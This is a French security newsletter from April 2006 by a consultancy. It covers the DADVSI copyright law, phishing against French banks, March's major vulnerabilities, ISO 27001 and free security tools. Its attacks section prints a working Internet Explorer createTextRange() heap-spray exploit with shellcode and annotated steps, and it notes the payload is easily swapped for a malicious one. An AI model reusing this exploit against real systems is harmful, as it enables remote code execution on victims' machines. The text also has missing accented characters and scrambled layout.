LA SCURIT INFORMATIQUE

AVRIL 2006

LActu Scurit n2
Internet: le fourre-tout de linformation. PLAN
POINT JURIDIQUE Projet de loi relatif au Droit dAuteur et aux Droits Voisins dans la Socit de lInformation. (page 2) Le problme auquel nous sommes confronts aujourdhui est que ces moyens de communication sont aussi utiliss dans le cadre de lentreprise, qui, par nature, a besoin de matriser son environnement. Les menaces pullulent. Dsormais, moins dune minute suft infecter un poste connect sans protection sur Internet. Comment rendre Internet compatible avec les entreprises? De nombreux moyens existentet ont t implments au l du temps au sein des rseaux dentreprise : rewalls, anti-virus, systmes de dtection dintrusion (IDS), etc. Une menace nanmoins subsiste: comment grer le contenu du Web? Comment vrier quun contentieux avec un client mcontent ne prenne pas de proportions inquitantes? Comment garantir quaucun collaborateur ne publie dinformations condentielles partir de son email professionnel? Comment lutter contre la dsinformation? En un mot: comment raliser la revue de presse de lInternet? Le gigantisme de la tche pose de nombreux problmes pratiques, auxquels sont rgulirement confronts les entreprises. Tout le monde savoue un peu dpass par lampleur du phnomne qui sautoalimente. De plus en plus dobservateurs voient en Internet une crature dont le contrle aurait chapp son crateur. Pourtant, il existe certainement des moyens de limiter les risques. Cest en tout cas ce quesprent les responsables de scurit et les services de communications Nous avons donc dcid de relever ce d aux cts de nos clients an de trouver des solutions. Je vous ferai part prochainement de lavancement de nos travaux. Marc Behar
1

NOUVELLE TENDANCE Le phishing, une attaque de plus en plus utilise par les pirates. (page 4)

ATTAQUES ET ALERTES MAJEURES Description et analyse des attaques et menaces les plus importantes parues durant le mois de Mars. (page 6)

>1997: Internet colonise massivement les entreprises. >2002: LADSL fait ses dbuts. >2004: Le haut dbit envahit les foyers franais. >2006: Lexplosion dInternet rend sa matrise dlicate.

VOLUTION NORMES ET STANDARDS Prsentation de la norme de scurit certiante ISO27001 (BS7799-2). (page 10)

OUTILS LIBRES Dcouvrez et suivez les volutions des outils libres les plus utiles et efcaces. (page 13)

Il aura fallu 10 ans pour quInternet soit peru comme la troisime rvolution industrielle. Contrairement aux deux prcdentes, celle-ci sest impose sans aucun mode demploi. Mme les spcialistes sy perdent: forums, blogs, Instant messaging, mailing-list, newsgroups, mails, VoIP sont autant de nouveaux moyens de communiquer et dchanger. Chacun dispose de ses propres codes, de ses spcicits. Ces outils sont mis la disposition de profanes. De fait, tout devient permisPuisquil est si facile de crer son propre blog, puisquil est grisant de savoir que ses condences les plus intimes seront parcourues par des milliards de lecteurs potentiels, pourquoi ne pas se laisser emporter dans cette euphorie collective? Pourquoi ne pas prendre le TGV de linformation?

XMCO PARTNERS - CABINET DE CONSEIL EN SCURIT DES SYSTMES DINFORMATION

www.xmcopartners.com

LA SCURIT INFORMATIQUE AVRIL 2006

1. POINT JURIDIQUE:
PROJET DE LOI RELATIF AU DROIT DAUTEUR ET AU DROITS VOISINS DANS LA SOCIT DE LINFORMATION

Ce mois-ci aura t marqu par une loi suivie de prs par les internautes adeptes du Peer to Peer et de la copie prive. En effet la loi DADVSI (Droit d'Auteur et aux Droits Voisins dans la Socit de l'Information) devait proposer une solution aux problmes du piratage informatique. En effet, les tlchargements sont la cause de bon nombre de soucis dans lunivers phonographique et cinmatographique.

XMCO | Partners

Petit rappel

Les divers sujets et amendements de cette loi :

Le but initial des industriels dans l'adoption de cette loi, tait dtudier et de mettre en place sur les uvres protgesdes dispositifs: qui interdit la reproduction dune uvre protge. danti-usagequi permet de ne lire certains chiers qu partir de certains logiciels ou matriels (baladeur). d'identication de l'utilisateur qui autorise la lecture aux utilisateurs identis possesseurs dune license. de tatouage de l'uvre qui permet de tracer luvre, de la redistribuer et den interdire la lecture au del dune date prdnie. de traage de l'usage qui enregistre la transmission d'informations via internet vers un serveur industriel chaque utilisation d'une uvre.
danti-copie

ou GDN (Gestion de Droits Numriques). Cette technique avait pour but de restreindre la diffusion par copie des contenus numriques tout en grant les droits dauteur et les marques dposes. Une architecture fut mme tudie an de permettre lapplication de ce projet. Le principe tait le suivant: un serveur stockait les chiers protgs par droit dauteur et le client possdait un logiciel capable de consulter ces chiers (lecteur multimdia, MP3 ). Un utilisateur qui souhaitait tlcharger un chier devait fournir un identiant unique au serveur. Le serveur envoyait alors le chier chiffr demand spcialement pour ce client. Enn, lorsque lutilisateur voulait consulter ce chier tlcharg (par Internet), le lecteur tablissait une connexion avec le serveur qui sassurait que lutilisateur possde bien une license valide linstant prsent. Si ctait le cas, le lecteur pouvait alors dchiffrer le chier et le lire.

Une license tait alors propre un ordinateur et paye mensuellement par les internautes. Ds lors, de nombreux opposants, dont lAlliance Public-Artistes et les partisans du logiciel libre, ont fait part de leur mcontentement. Ils estimaient que le gouvernement devait retirer ce texte qui allait lencontre des liberts individuelles.

Les promoteurs ont donc, la n du mois de dcembre, prsent ce projet qui vise protger les DRM (Digital Rights Management)
www.xmcopartners.com

XMCO PARTNERS - CABINET DE CONSEIL EN SCURIT DES SYSTMES DINFORMATION

LA SCURIT INFORMATIQUE AVRIL 2006

Historique

Bref retour en arrire et explication des articles adopts.

Le projet DADVSI commena ds la n du mois de dcembre. Un projet de licence globale vit le jour. L'amendement majeur avait pour but de faire payer les internautes qui tlchargent partir de rseaux Peer to Peer, sous forme d'un abonnement mensuel. Durant 2 jours, les dputs ont dbattu et nalement certains amendements ont tout de mme t vots mais le projet de loi DADVSI est repouss en Mars 2006. Deux mois plus tard, la loi DADVSI sera nouveau tudie par l'assemble. Plusieurs thmes seront abords et divers points seront tudis. Cinq thmes majeurs ont nalement t adopts dont voici les conclusions nales.

Le P.V. numrique : L'interoprabilit :

L'exigence d'interoprabilit qui impose tous chiers tlchargs lgalement sur Internet, d'tre lisibles sur n'importe quel logiciel ou matriel, a t accepte. Cet article est donc vivement contest par Apple avec son application de tlchargement en ligne Itunes. En effet, les chiers mp3 tlchargs partir du site d'Apple taient jusqu' prsent seulement lisibles par un Ipod ou le logiciel Itunes. Dsormais, ces chiers ne devront plus tre protgs. Apple craint donc une chute des ventes et s'oppose farouchement une telle mesure. Enn le dernier point et le plus important pour les utilisateurs de rseaux Peer to Peer concerne le tlchargement de chiers protgs qui reste illgal et sera svrement puni. Plusieurs sanctions contre les tlchargements sauvages ont t approuves et des amendes seront adaptes en fonction du dlit. Le tlchargement illicite d'une uvre protge par droits d'auteur cotera 38 euros. De plus, une amende de 150 euros sera applique pour la mise disposition via Internet d'un tel chier. La duplication d'un DVD vido verrouill cotera 750 euros et sa mise en ligne cotera 30 000 euros. Une brigade spcialise aura pour charge de reprer les fraudeurs. Les adresses IP connectes aux rseaux Peer to Peer seront releves par un ofcier de police judiciaire et envoyes au fournisseur d'accs an de rcuprer les noms des "pirates". On peut se demander quels moyens seront mis en uvre et comment sera applique cette rpression. De nombreuses difcults se posent... Les dmarches administratives pour chaque cas seront complexes, il est donc probable que lEtat sanctionne lourdement quelques internautes pour lexemple, en devenant plus clment par la suite. Ces coups mdiatiques seront consquents pour effrayer les utilisateurs des rseaux Peer to Peer. Tout comme Apple, lAmrique reste fermement oppose une telle loi qui selon elle va lencontre des liberts individuelles a soulign le secrtaire dEtat Gutierrez. Le Los Angeles Time a dailleurs jug ce projet de pur protectionnisme franais. Ct allemand, la mise en place dune loi similaire rprimanderait plus svrement les fraudeurs avec une peine maximale de 5 ans de rclusion pour le partage de donnes!

La copie prive : La license globale :

Le premier point concerne la license globale. Aprs une premire proposition la n du mois de dcembre, cet article sera nalement rejet. L'article 1, dont les dispositions assimilent le tlchargement via les rseaux Peer to Peer de la copie prive, a tout d'abord t rejet puis rintroduit. Une confusion totale tait alors palpable l'Assemble. Malgr les efforts des partisans de cet article la license globale, qui instaure une taxe des fournisseurs d'accs au titre de la copie prive, est tout de mme rejete. Le nouveau texte pousse l'utilisation des plateformes lgales. Quatrime point : le primtre de la copie prive sera maintenant soumis aux mesures imposes par un collge de Mdiateurs. Ce groupe aura la charge de dnir le nombre de copies autorises dans le cadre de la copie prive. Une seule exception, la copie prive de DVD, qui est dsormais interdite par la loi.

Les protections DRM :

Le deuxime point concernant les mesures de protection est enn reconnu par la loi. Tout contournement de telles protections sera dsormais considr comme un dlit. Un pirate qui dveloppe des outils de contournement risque 6 mois de prison ferme et 30 000 euros d'amende. Un individu qui utilise ces techniques est passible dune amende de 750 euros.
XMCO PARTNERS - CABINET DE CONSEIL EN SCURIT DES SYSTMES DINFORMATION

www.xmcopartners.com

LA SCURIT INFORMATIQUE AVRIL 2006

2. NOUVELLE TENDANCE :
LE PHISHING, UNE ATTAQUE DE PLUS EN PLUS UTILISE PAR LES PIRATES.
Ce mois de Mars aura t marqu par un nombre important de tentatives de Phishing. Cette attaque en vogue dans le milieu des pirates se dveloppe continuellement et pige un nombre consquent dutilisateurs. Les prcdentes tentatives lencontre de banques trangres paraissaient plus ou moins inefcaces en France, au vue des moyens utiliss par les attaquants. Malheureusement, depuis le dbut de lanne, plusieurs attaques, diriges vers les clients des banques franaises, ont t rpertories.

XMCO | Partners

Le phishing une tendance conrme

En effet, de nombreux spcialistes saccordent le dire. Sophos a publi en Fvrier une tude portant sur 600 utilisateurs. Le bilan savre lourd: 58% des salaris dans les entreprises reoivent, au moins, un message par jour, qui imite celui dune banque. 22% en reoivent quotidiennement plus de cinq. Le phishing na donc jamais t aussi prsent. Il est important de rappeler que cette technique consiste envoyer un email diffus grande chelle pour conduire le plus grand nombre de personnes crdules se connecter sur un site pirate. Les attaquants contactent simultanment des dizaines de milliers de personnes, et comptent sur ce grand nombre pour qu'au moins une fraction des destinataires tombe dans le pige tendu. Plusieurs raisons (validation de compte, problme de maintenance, vrication des informations ) sont invoques pour convaincre lutilisateur de suivre le lien vers le site pirate. Le destinataire du courriel malveillant est alors redirig vers un site qui ressemble celui de sa banque pour rcuprer les informations sensibles entres par la victime (nom dutilisateur, mot de passe, donnes bancaires). Notons que, les pirates informatiques, utilisateurs de ce type dattaque, apportent une attention grandissante aux dtails. En effet, les internautes sont de plus en plus informs sur ce genre de pratiques. De ce fait, seules les contrefaons identiques loriginal pourront permettre de duper le plus grand nombre dutilisateurs.

mail malveillant au couleurs de la Socit Gnrale

mail malveillant au couleurs du Crdit Lyonnais

4

XMCO PARTNERS - CABINET DE CONSEIL EN SCURIT DES SYSTMES DINFORMATION

www.xmcopartners.com

LA SCURIT INFORMATIQUE AVRIL 2006

Longtemps mal traduits dans leur langue, les franais pouvaient facilement identier les emails malveillants. Dsormais, les emails malicieux sont trs bien crits et les sites associs reproduisent parfaitement les sites des banques victimes. Les pirates utilisent plusieurs techniques de contournement des ltres antispam et des ltres antiphishing. Le texte rdig est, en fait, une image accompagne d'un texte et d'un titre variable cach dans le code source du message. Les ltres bass sur l'analyse du texte sont ainsi tromps. A lheure o nous crivons ces lignes, 56 attaques de Phishing ont t identies. La plupart visent des sites dachat en ligne ou des banques trangres. Malgr tout, les banques franaises ont aussi t touches. Le crdit Lyonnais, la Socit Gnrale, la BNP, HSBC, AOL et Microsoft Update font parti des nombreuses victimes du mois. Les attaques des banques franaises proviennent, sans aucun doute, du mme pirate qui a hberg les sites sur des serveurs Corens. Une fois les victimes sur le site pirate et leurs informations condentielles saisies, les donnes sont rcupres et la victime est redirige vers le site ofciel de la banque en question. Vous trouverez ces attaques dans nos prcdents bulletins:
n1142854718 (BNP) n 1142930896 (Socit Gnrale) n1142963045 (Crdit Lyonnais).

The Phishing Incident PhishRegistry.org

Reporting & Termination Squad

Ces deux sites permettent de grer ce genre dincident. Ils reportent lattaque auprs des autorits et alertent les clients enregistrs en cas de tentative de phishing. Voici leur adresse respective :
http://www.phishregistry.org/ http://castlecops.com/modules.php?name=Fried_Phish

Site officiel

Nous vous rappelons, titre prventif, qu'aucune banque ou site d'achat en ligne n'envoie de courrier lectronique ses clients sur les mots de passe ou bien sur les coordonnes bancaires. Nous vous conseillons donc de ne jamais ouvrir le lien d'un email dont vous n'tes pas certain de la lgitimit et surtout, de ne jamais entrer vos informations bancaires par le biais d'un lien reu par email. Xmco Partners dveloppe actuellement un service de surveillance pour des socits victimes de telles attaques. Notre logiciel surveillera le web la recherche darticles, de blogs, de logiciels, de sites web, dURL, ou tout ce qui porte atteinte limage de marque de lentreprise. Chaque jour une analyse sera ralise par nos quipes et des bulletins seront alors remis aux clients. Ces bulletins journaliers ont pour but d'alerter au plus tt les entreprises victimes d'attaque. En effet, ces entreprises doivent ragir rapidement en mettant en place une cellule de crise et des mesures dnies auparavant par les diffrents dpartements concerns (service communication, service juridique, service informatique). Ainsi des dispositions pourront tre adoptes sur le site lgitime de la socit en prvenant les clients par des messages explicites ou autres. Enn, deux nouveaux sites viennent d'tre mis a la disposition des internautes:
XMCO PARTNERS - CABINET DE CONSEIL EN SCURIT DES SYSTMES DINFORMATION

Site pirate
5

www.xmcopartners.com

LA SCURIT INFORMATIQUE AVRIL 2006

3. ATTAQUES MAJEURES :
TOP 5 DU MOIS DE MARS
Le mois de mars a t marqu par la publication dune faille critique de la plate-forme Windows et de nombreuses vulnrabilits et exploits pour Internet Explorer. Dautre part, Sendmail, qui est largement utilis dans les entreprises, est aussi touch par une vulnrabilit.

XMCO | Partners

MS06-012

Excution de code distance via un document Ofce malicieux

Plusieurs vulnrabilits prsentes au sein du produit Ofce de Microsoft ont t corriges. La plupart des versions de la suite bureautique de Microsoft sont concernes. Seuls les produits Microsoft Ofce Excel 2000 Viewer, Microsoft Ofce Excel 2002 Viewer, Microsoft Word 2003, Microsoft Outlook 2003 et Microsoft PowerPoint 2003 ne sont pas affects. Un attaquant peut compromettre distance un systme vulnrable en crant un chier Excel malicieux. Lors de louverture dun tel document, le pirate pourrait excuter du code en fonction des droits de la victime. En dautres termes, lattaquant peut insrer un cheval de Troie dans un document Ofce et prendre ainsi le contrle du poste de lutilisateur abus. A noter que si la victime est administrateur de son systme, le contrle total de la machine est possible. Les cinq premires failles sont issues du logiciel Excel. Le premier problme rsulte de lutilisation dune plage de donnes malformes qui pourrait corrompre la mmoire du systme. La seconde faille est due une erreur faite lors de lanalyse du format dun chier malform. Troisimement, un problme peut survenir lors de lutilisation dune description malforme et provoque ainsi une erreur de mmoire du systme.

La quatrime faille rsulte dune erreur de mmoire lors de louverture dun chier contenant un graphique malform. La cinquime vulnrabilit vient de la soumission dun enregistrement malform sur un document Ofce qui est ensuite exploit par lattaquant. Enn la dernire faille provient dune corruption de la mmoire et peut tre exploite en construisant un bordereau de routage spcialement conu dans un document Ofce.

XMCO PARTNERS - CABINET DE CONSEIL EN SCURIT DES SYSTMES DINFORMATION

www.xmcopartners.com

LA SCURIT INFORMATIQUE AVRIL 2006

Toutes ces vulnrabilits peuvent tre exploites par le biais d'un serveur web pirate ou par l'envoi d'emails malicieux. Malgr tout, une attaque ne peut tre directe, lexploitation de ces vulnrabilits ncessite lintervention de lutilisateur, savoir le tlchargement et lexcution du chier spcialement conu.

Plusieurs vulnrabilits ont t dcouvertes. Les failles proviennent d'erreurs de traitement des tags ayant plusieurs vnements tels que : onhelp, onclick, ondblclick, onkeyup, onkeydown, onkeypress... En incitant la viste dun site Web malicieux, la page HTML spcialement conue pourrait provoquer l'arrt du navigateur. Une autre faille vient dune mauvaise gestion de la mmoire. En effet, la fonction create.TextRange() fait appel des espaces mmoire non allous. Ce dysfonctionnement peut tre exploit par un attaquant distant an dexcuter des commandes arbitraires sur un systme vulnrable. Pour exploiter cette faille, lattaquant incitera la victime visiter une page HTML malveillante pralablement mis en place. Depuis la divulgation de cette vulnrabilit, de nombreuses preuves de concept ont t publies. Ces programmes permettent de gnrer automatiquement des pages HTML malicieuses. Une fois charges, ces pages exploitent la faille et excutent du code arbitraire.

Aucun programme malveillant qui exploite cette faille n'est actuellement disponible sur Internet. Cependant, des pistes ont t dvoiles. Il est probable que diffrentes preuves de concept verront le jour prochainement. Programmes vulnrables: Microsoft Ofce 2000 SP 3 Microsoft Ofce XP SP 1 / 2/ 3 Microsoft Works Suites Microsoft Ofce X pour Mac Microsoft Ofce 2004 Criticit : Eleve Rfrence Xmco: n 1142413618

Plusieurs programmes malveillants ont t publis. Une simple visite du site qui contient la page HTML malforme permet lexploitation de la vulnrabilit. Le programme le plus malicieux cr ce jour, permet uniquement de lancer la calculatrice. Lexploit prsent ci-dessous gnre ces pages HTML utilises pour piger les victimes. Notons que cette version inoffensive peut tre aisment modie par un pirate an dexcuter des actions plus prjudiciables.

KB917077

Excution de code distance et Dni de service via Internet Explorer (createTextRange())

Aprs la publication de plusieurs programmes qui permettent dattaquer et dexcuter distance des commandes arbitraires ou bien de provoquer des dnis de service, Microsoft publi un bulletin dalerte pour son navigateur Internet. Ce bulletin expose diffrentes solutions de contournements pour diminuer les risques dexploitation en attendant la publication du correctif ofciel.

XMCO PARTNERS - CABINET DE CONSEIL EN SCURIT DES SYSTMES DINFORMATION

www.xmcopartners.com

LA SCURIT INFORMATIQUE AVRIL 2006

<input type="checkbox" id="blah"> <SCRIPT language="javascript"> shellcode = unescape( "%u9090%u9090%u9090%uC929%uE983%uD9DB%uD 9EE%u2474"+"%u5BF4%u7381%uA913%u4A67%u83C C%uFCEB%uF4E2%u8F55"+"%uCC0C%u67A9%u89C1 %uEC95%uC936%u66D1%u47A5%u7FE6"+"%u93C1% u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69 "+"%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u 9871%u638D"+"%u2F3F%u3822%uCD6E%u0142%uC0 C1%uECE2%uD015%u8CA8"+"%uD0C1%u6622%u45A 1%u43F5%u0F4E%uA798%u472E%u57E9"+"%u0CCF% u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C 40"+"%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uEC A9%uF022%u56F6"+"%uACBC%u8CFF%uA447%uBFD 7%uBFA8%uFFC1%u46B4%u30A7"+"%u2BB5%u8941% u33B5%u0456%uA02B%u49CA%uB42F%u67CC" +"%uCC4A%uD0FF"); bigblock = unescape("%u9090%u9090"); slackspace = 20 + shellcode.length while (bigblock.length < slackspace) bigblock += bigblock; fillblock = bigblock.substring(0, slackspace); block = bigblock.substring(0,bigblock.length-slackspace); while(block.length + slackspace < 0x40000) block = block + block + fillblock; memory = new Array(); 3. Mise en place de la charge utile sur la pile dexcution du programme. Une fois la fontion createTextRange() appelle, le programme excutera le shellcode ci-contre.

1. Laffectation du code malicieux la variable shellcode. Ce code sera excut lors de louverture de la page. Dans notre cas nous lancerons la calculatrice de Windows.

2. Mise au point pour mapper correctement le code malicieux en mmoire.

for ( i = 0; i < 2020; i++ ) memory[i] = block + shellcode;

Amorage de lattaque avec lexploitation de la vulnrabilit de createTextRange() var r = document.getElementById('blah').createTextRange(); </script>

Preuve de concept lanant la calculatrice de Windows.

A louverture de la page HTML gnre par ce programme, lappel de la fonction createTextRange() (4) effectuera un accs illicite la mmoire. Cet effet de bord permet dexcuter le code malveillant plac en mmoire antrieurement (3). Dans le cas prsent le code malveillant excut est celui de la calculatrice de Windows (1). Notons quil est ais de modier ce programme au vue dune utilisation malveillante.

Programmes vulnrables: Internet Explorer 6.0 Internet Explorer 7 beta 2 Criticit : Eleve Rfrence Xmco : n 1143133960 n 1143105301 n 1143447561 n1142853400 n 1143019395

XMCO PARTNERS - CABINET DE CONSEIL EN SCURIT DES SYSTMES DINFORMATION

www.xmcopartners.com

LA SCURIT INFORMATIQUE AVRIL 2006

Cheval de Troie install partir dune animation Flash (.swf)

Macromedia Products Unspecied Remote Command Execution Vulnerabilities

Plusieurs vulnrabilits ont t dceles au sein du lecteur Flash de Macromedia. Les diffrents problmes rsultent de la mauvaise gestion de chiers SWF malforms chargs dans le lecteur Flash. Un attaquant pourrait compromettre un systme vulnrable avec la cration dun chier dextension SWF hberg sur un site web. Un utilisateur qui visiterait un site malicieux pourrait donc tre victime dune telle attaque.

La vulnrabilit exploite vient d'une erreur prsente dans l'application Mail implmente par le systme d'Apple. En effet, ce programme gre incorrectement certains emails malforms (avec un champ "Real Name" excessivement long). Cette absence de validation pourrait tre exploite par un attaquant distant an de causer un dbordement de tampon mmoire et ainsi excuter des commandes arbitraires sur un systme vulnrable. Programmes vulnrables: Mac OS X Criticit : Eleve Rfrence Xmco: n1142333841(Correctif) n1142332433(Exploit) Compromission dun systme avec des mails malicieux

Vulnrabilit dans Sendmail

Une faille dans le clbre logiciel serveur de mail sendmail vient dtre publie. Ce problme, qui affecte toutes les distributions, rsulte d'une corruption de la mmoire lors de l'envoi de donnes malicieuses durant certains intervalles de temps. Ceci peut permettre l'attaquant d'excuter des commandes avec les privilges de l'utilisateur.

Aucune autre information n'a actuellement t communique par l'diteur. Cependant, une mise jour est disponible sur le site de lditeur. Programmes vulnrables: Lecteurs Flash Criticit : Eleve Rfrence Xmco: n 1142437567 Excution de code arbitraire avec lapplication Mail

Exploit pour Mail de Mac OS X

Apple, qui ft la cible des attaques majeures du mois de fvrier 2006, a rcemment publi un correctif pour deux de ses produits: Mail et Safari. Lune de ces failles est dsormais facilement exploitable Il suft dutiliser la preuve de concept publie peu de temps aprs.

Programmes vulnrables: Toutes les plateformes Criticit : Eleve Rfrence Xmco: n1143620172 (F-Secure) n1143536363 (HP-UX) n1143193611 (RED-HAT) n1143127834 (SUSE) n1143125351 (SOLARIS) n1143122131 (DEBIAN) n1143119727 (FEDORA) n1143110560 (AIX)
9

XMCO PARTNERS - CABINET DE CONSEIL EN SCURIT DES SYSTMES DINFORMATION

www.xmcopartners.com

LA SCURIT INFORMATIQUE AVRIL 2006

4. EVOLUTION DE NORMES :
Les normes lies la scurit informatique voluent continuellement et donnent naissance la premire certication dans le domaine. Les acteurs nanciers, les clients et les partenaires des grandes entreprises accueillent cette nouvelle avec un grand intrt car elle reprsente une garantie supplmentaire.

XMCO | Partners

La naissance dune norme de scurit de linformation.

Les normes ISO 17799 et ISO27001 (BS7799-2)

Les normes ISO sont, depuis prs de 10 ans, la rfrence en matire de scurit. Un grand nombre dentreprises tournes vers lexportation et linternational ont ressenti la ncessit dtablir des rfrentiels mondiaux de scurit. Ceci an dtablir un climat de conance auprs des clients et des partenaires mants. Les normes ISO sont apparues. Elles sont dsormais gres par une Organisation non gouvernementale qui fdre des organismes nationaux et s'occupe d'dicter des normes internationales. Il est important de connatre les diffrents standards qui dnissent les normes de certication d'une organisation en scurit des systmes d'informations. Cest pourquoi nous expliquerons les grandes lignes des normes ISO17799 et ISO27001 (BS7799-2). Ces dernires ont t mises en place pour prciser les mesures et les mthodes de management dun systme dinformation. Lvolution de BS7799 lISO 17799.

La norme anglaise BS 7799 est lorigine de cette norme ISO. Cre en 1995 par le British Standard Institute (quivalent de lAFNOR en France), cette norme instaure des standards de qualit et de performance pour lindustrie. En 1999, elle connat un succs international et est adopte en tant que ISO/IEC 17799:V2000. Seuls des pratiques et des contrles sont dicts par ce texte. Aucune rfrence une quelconque certication ny est mentionne. Un an plus tard, une rvision sera effectue an duniformiser lenvironnement de la scurit informatique. Elle aboutira, en mars 2005, la version 2 de la norme ISO 17799. Concrtement, lISO 17799 se distingue par sa reconnaissance et sa diffusion mondiale auprs des plus grands comptes. Cependant, elle ne dnit aucune exigence (matrielle ou logicielle) et est, de ce fait, remise en question. Elle est donc cense donner une certication vritable avec la version BS 7799-2.

La norme ISO 17799 se compose de 10 chapitres. De nombreux points importants y sont abords: chapitres sont ddis au management de la scurit des informations (les politiques de scurit, lorganisation, la classication et le contrle). 2 chapitres sur la scurit du personnel (contrle lors du recrutement, formation et sensibilisation) et sur la scurit physique (quipements et primtre de scurit). 5 chapitres sur le dveloppement de lexploitation des systmes dinformation (contrles daccs, dveloppement et maintenance des systmes, gestion de la continuit).
3

Chaque chapitre est articul autour de plusieurs points: les objectifs, les mesures mettre en uvre, les recommandations et les contrles effectuer. LISO 17799 est donc une sorte dinventaire des bonnes pratiques et des points importants vrier au sein dun systme dinformation.

La norme ISO 17799

www.xmcopartners.com

XMCO PARTNERS - CABINET DE CONSEIL EN SCURIT DES SYSTMES DINFORMATION

10

LA SCURIT INFORMATIQUE AVRIL 2006

Enn une norme certiante.

La norme ISO27001 (BS7799-2).

En octobre 2005, le standard BS 7799-2 est adopt par l'ISO. Il introduit le nouveau standard international ISO/IEC 27001:2005. Plus quun simple guide la version BS7799-2 soccupe, quant elle, de prsenter et de dnir les mthodes appliquer pour assurer une bonne gestion de la scurit. Elle ne sassure pas de lefcacit des moyens mis en uvre mais de lexistence relle de ceux-ci. Une dmarche PDCA (Plan, Do, Check, Act) galement appele roue de Deming prcise les tapes de lapplication des mesures de scurit (voir schma ci-dessous).

Schma du site http://www.ysosecure.com Depuis Mars 2005, la certication BS7799-2 est enn possible. Elle garantit quune entreprise a mis tous les moyens en place pour matriser son systme dinformation. Elle assure ainsi une crdibilit et une conance certaine auprs des clients. Celle-ci est base sur deux tapes: une tude de la documentation de lentreprise audite et une vrication de la gestion mis en uvre an dassurer la scurit du systme. Les entreprises qui adoptent l'ISO 27001 sont libres de choisir les contrles spciques adapts aux besoins et aux risques de chacun. Prs de 1800 socits ont ainsi t certies au standard BS 7799 part 2 (ou les quivalents nationaux). Ce besoin se dveloppe considrablement. A noter, que cette certication n'est pas impose comme la loi Sarbannes-Oxley (voir numro 1 du mois de Mars d'Actu Scurit"). Cependant, les partenaires et les clients sont de plus en plus attentifs ces normes car elles sont sources de crdibilit. La certication est importante dans une entreprise car elle donne une dimension sure et internationale. Toute certication se dnie comme une mthode qui atteste, par l'intermdiaire d'une vrication indpendante et neutre, qu'un systme rpond aux normes de qualit. Malgr lengouement pour ces certications, peu dorganismes franais permettent de certier BS7799-2 (LSTI est le principal acteur dans ce domaine).

XMCO PARTNERS - CABINET DE CONSEIL EN SCURIT DES SYSTMES DINFORMATION

www.xmcopartners.com

11

LA SCURIT INFORMATIQUE AVRIL 2006

Promisec Spectator surveille votre parc Windows sans agent.

Identifier les machines non conformes et surveiller lapplication de votre politique de scurit.
Avec la mise en place de diverses certications (ISO127001) et daudits de scurit en rapport avec la loi Sarbannes-Oxley (voir article sur ce sujet dans Actu-Securit de Mars 2006), les RSSI doivent trouver des solutions appropries an de vrier la bonne application de leur politique de scurit. Malheureusement, le problme majeur rside dans ce contrle et dans lanalyse de parcs informatiques importants.
Comment

quelques clics tre dtects puis rassembls dans un tableau qui pourra tre export sous forme de rapport. Toutes les menaces peuvent tre dtectes. Cependant, il est galement possible de les radiquer en quelques clics partir de la mme solution logicielle. Plusieurs analyses peuvent tre excutes simultanment. En effet, de nombreuses congurations spciques peuvent tre dnies et lances de manire indpendante. Lanalyse est effectue partir dun unique poste. Loutil peut intervenir directement sur la base de registre du poste distant. Dans le cas o une valeur serait non conforme, il est possible de forcer lapplication de la politique de scurit en modiant cette valeur. Ci-dessous, une capture dcran vous montre comment dnir une clef de registre analyser. Ici, nous souhaitons vrier si les crans de veille sont protgs par un mot de passe.

contrler rapidement et efcacement lapplication de cette politique? utilisateurs de votre rseaux utilisent-ils des logiciels de messagerie instantane, des clefs USB personnelles ou encore des modems?

Les

Dautres points plus critiques font galement lobjet dune analyse, lapplication des correctifs Microsoft ou lexistence des comptes invits ou encore lutilisation dun proxy etc... La gestion de ces paramtres devient donc un vritable casse-tte pour les responsables en scurit et les administrateurs rseaux. Conscients de cette problmatique, les diteurs nous proposent diverses solutions. Parmi elles, une est base sur le protocole WMI (Windows Management Instrumentation). Lavantage de cette approche est dobtenir une solution simple et efcace. En effet, une analyse prcise, voire minutieuse, du registre des machines scannes est effectue en peu de temps. Ainsi, partir du port 135 ouvert sur les machines cibles, ce programme peut faciliter la recherche dinformations, de chiers, de matriels, de logiciels et de processus actifs divers. Cette solution est propose par la socit Promisec. Cette entreprise, base en Isral, est la premire dvelopper une solution sans agent. Loutil est entirement paramtrable et ne ncessite pas dagent sur les machines audites. Lapplication permet, au travers dune interface simple, de rechercher une panoplie dinformations sur un rseau. Les applications P2P, les types de chiers prohibs par votre politique, les priphriques connects, les logiciels antivirus, les correctifs et Service Pack peuvent en
XMCO PARTNERS - CABINET DE CONSEIL EN SCURIT DES SYSTMES DINFORMATION

Spectator est un vritable couteau suisse. En effet, les possibilits de conguration permettent la mise en place des tests pointus en adquation avec la politique de scurit dnie. Une fois en place ces tests peuvent tre lancs de manire rgulire et planie an dobtenir un rel baromtre de la conformit des rseaux surveills.

www.xmcopartners.com

12

LA SCURIT INFORMATIQUE AVRIL 2006

5. OUTILS LIBRES :
FOCUS SUR 5 PRODUITS LIBRES Chaque mois, nous vous prsentons les outils libres qui nous paraissent indispensables. Les logiciels abords sont varis: utilitaire de scurit et autres programmes ncessaires au sein dune entreprise. Pour notre second numro, nous avons choisi danalyser des logiciels Internet, un client ssh et deux outils de scurit: ClamAV et ClamWin: Antivirus libre et adpatables sous Unix et Windows Firefox: devenu aussi clbre que IE est un Navigateur lger, efcace et pratique Putty: Client SSH lger et ddi a Windows SpamAssasin : Utilitaire de gestion de spams Thunderbird : Client mail capable de rpondre tous vos besoins Vous trouverez la n de cette section un tableau rcapitulatif des versions de tous les logiciels prsents lors des prcdents numros dActu Scurit. XMCO |Partners

XMCO PARTNERS - CABINET DE CONSEIL EN SCURIT DES SYSTMES DINFORMATION

www.xmcopartners.com

13

LA SCURIT INFORMATIQUE AVRIL 2006

ClamAntivirus
Antivirus
Version actuelle Utilit Type Description

ClamAV et ClamWin 0.88

Anti-virus pour Windows et distributions Linux ClamAV est un anti-virus permettant de grer prs de 20000 signatures. Cet outil est simple et efcace, les fonctions sont limites mais sufsent largement un utilisateur nal. La seule ombre serait la protection rsidente qui na pas t implmente. En effet, ClamAV ne scanne pas chaque chier copi ou tlcharg, il faut lancer un scan du dossier infect pour trouver le chier malsain. ClamAV reste un bon antivirus, qui a lavantage dtre libre et gratuit.

Capture dcran

Tlchargement

